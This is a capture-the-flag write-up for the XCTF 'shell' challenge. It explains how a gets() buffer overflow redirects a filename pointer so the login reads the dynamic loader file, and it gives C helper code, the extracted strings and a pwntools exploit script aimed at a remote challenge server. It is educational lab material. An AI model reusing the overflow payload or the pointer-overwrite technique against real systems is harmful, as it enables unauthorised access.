XCTF-shell-WP
An 8-point problem. It is not really hard, the trick is just sneaky, and I did not think of it, which is a real pity.
All input is read with gets, so overflowing is trivial. What we need is to set v16 to 1. The natural idea is to do that through the overflow, but it cannot be done: everything we can overflow lies below v16 (at lower addresses), so the only option left is to get through the login check.
nc to the server and ls: there is no creds.txt at all, so login can never succeed as shipped. However, the filename variable can be modified by the overflow, and the challenge ships an ld. So the plan is to change filename to point at the string /lib64/ld-linux-x86-64.so.2, which exists inside the program itself (it is the interpreter path every dynamically linked binary carries). The login check only cares that some line of the file it opens parses as username:password, so any readable file with a suitable line will do.
Then we only need to replicate how the program reads ld-linux-x86-64.so.2 to obtain a username and password that pass the check.
Getting the username and password
#include <cstdio>
#include <cstring>
char c[10000000];
char *user;
char *pass;
int main()
{
    FILE* p = fopen("./ld-linux-x86-64.so.2","r");
    if(p == NULL)
    {
        perror("fopen");
        return 1;
    }
    /* fgets() returns NULL at EOF; testing feof() first would process the last line twice */
    while(fgets(c,sizeof(c),p) != NULL)
    {
        /* the challenge treats each line as "username:password", so split on ':' */
        user = strtok(c,":");
        pass = strtok(NULL,":");
        if(user != NULL && pass != NULL)
        {
            pass[strcspn(pass,"\n")] = '\0';   /* drop the trailing newline */
            printf("username:");
            puts(user);
            printf("password:");
            puts(pass);
        }
    }
    fclose(p);
    return 0;
}
Data obtained (the first two pairs are raw binary from the ELF and unusable; the readable pairs come from the loader's debug strings)
username:ֻ$=uTi7J��GC���p�T��B���#d�<I�Xx�k߱;��k�<��sB�Ҋ|F
password:m�<�9
ܹןkC(�����F�
username: Version information
password:
username:prelink checking
password: %s
username:relocation processing
password: %s%s
username:calling init
password: %s
username:calling preinit
password: %s
username:calling fini
password: %s [%lu]
username:conflict processing
password: %s
username:runtime linker statistics
password:
username: total startup time in dynamic loader
password: %s
username: number of relocations from cache
password: %lu
username: number of relative relocations
password: %lu
username:WARNING
password: Unsupported flag value(s) of 0x%x in DT_FLAGS_1.
username: entry
password: 0x%0*lx phdr
username:runtime linker statistics
password:
username: final number of relocations
password: %lu
username:final number of relocations from cache
password: %lu
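The loader above prints every colon-separated pair it finds, including the binary junk in the first two groups, and a human then has to pick a usable one. As an added example (not the writeup's own program), the scanner below generalises that step: it splits any byte buffer into newline-terminated records, parses each one as username:password exactly as the strtok(":") loop does, and keeps only pairs that can actually be typed through gets() and compared with strcmp(), i.e. both fields non-empty, printable ASCII, with no NUL or newline. The sample input is constructed here to resemble what ld-linux-x86-64.so.2 yields; the first usable pair it returns is the "prelink checking" / " %s" pair the exploit uses.

```c
/* Added example: filter "user:pass" records from an arbitrary (binary) file
 * image, keeping only pairs usable as typed credentials. Not the writeup's code. */
#include <stdio.h>
#include <string.h>

#define MAX_FIELD 64

typedef struct {
    char user[MAX_FIELD];
    char pass[MAX_FIELD];
} cred_t;

/* True if n > 0 and every byte in [s, s+n) is printable ASCII (0x20..0x7e).
 * This rejects NUL (strcmp would stop early), newline (gets would stop early)
 * and the high bytes that made the first two pairs in the writeup garbage. */
static int all_printable(const unsigned char *s, size_t n)
{
    if (n == 0) return 0;
    for (size_t i = 0; i < n; i++)
        if (s[i] < 0x20 || s[i] > 0x7e) return 0;
    return 1;
}

/* Split buf into '\n'-terminated records. In each record the username is the
 * text before the first ':' and the password the text between the first and
 * second ':' (or to end of record if there is no second ':'), mirroring the
 * strtok(":") parse. Fills out[] with up to max usable pairs, returns count. */
size_t find_candidates(const unsigned char *buf, size_t len, cred_t *out, size_t max)
{
    size_t found = 0, start = 0;
    for (size_t i = 0; i <= len && found < max; i++) {
        if (i < len && buf[i] != '\n') continue;      /* not yet at end of record */
        const unsigned char *rec = buf + start;
        size_t rlen = i - start;
        start = i + 1;
        const unsigned char *c1 = memchr(rec, ':', rlen);
        if (!c1) continue;                             /* no separator: skip */
        size_t ulen = (size_t)(c1 - rec);
        const unsigned char *p = c1 + 1;
        size_t rest = rlen - ulen - 1;
        const unsigned char *c2 = memchr(p, ':', rest);
        size_t plen = c2 ? (size_t)(c2 - p) : rest;
        if (ulen >= MAX_FIELD || plen >= MAX_FIELD) continue;
        if (!all_printable(rec, ulen) || !all_printable(p, plen)) continue;
        memcpy(out[found].user, rec, ulen); out[found].user[ulen] = '\0';
        memcpy(out[found].pass, p, plen);   out[found].pass[plen] = '\0';
        found++;
    }
    return found;
}

/* Constructed sample (not real ld.so contents): binary junk like the first
 * pairs in the writeup, then lines resembling the loader's debug strings. */
static const unsigned char sample[] =
    "\x7f\x45\x4c\x46\x02\x01\x01\x00junk:\xff\xfe\n"   /* high bytes: rejected */
    " Version information:\n"                         /* empty password: rejected */
    "prelink checking: %s\n"                          /* usable */
    "relocation processing: %s%s\n"                   /* usable */
    "with\x00nul: pass";                              /* embedded NUL: rejected */

int main(void)
{
    cred_t creds[16];
    size_t n = find_candidates(sample, sizeof(sample) - 1, creds, 16);
    for (size_t i = 0; i < n; i++)
        printf("username:%s\npassword:%s\n", creds[i].user, creds[i].pass);
    return 0;
}
```

Run it against the real loader by reading /lib64/ld-linux-x86-64.so.2 into a buffer with fread (not fgets, which is what produced the garbage lines above) and passing that buffer to find_candidates(); the first pair returned is the one to type at the login prompt.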
The third pair is a good one, so we have:
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh = remote("111.200.241.244",42409)
#sh = process("./shell")
# the "prelink checking: %s" pair recovered from ld-linux-x86-64.so.2 above;
# the trailing NUL terminates the string for the strcmp() in the login check
name = b"prelink checking\x00"
password = b" %s\x00"
sh.sendlineafter(b"$ ", b"login")
sh.sendlineafter(b"Username: ", name)
# pad from the password buffer up to the filename pointer, then overwrite it
# with the address of the "/lib64/ld-linux-x86-64.so.2" string in the binary,
# so that login opens the loader instead of the missing creds.txt
payload = password.ljust(0x5c - 0x18, b"\x00") + p64(0x400200)
sh.sendlineafter(b"Password: ", payload)
sh.interactive()
Nice and short.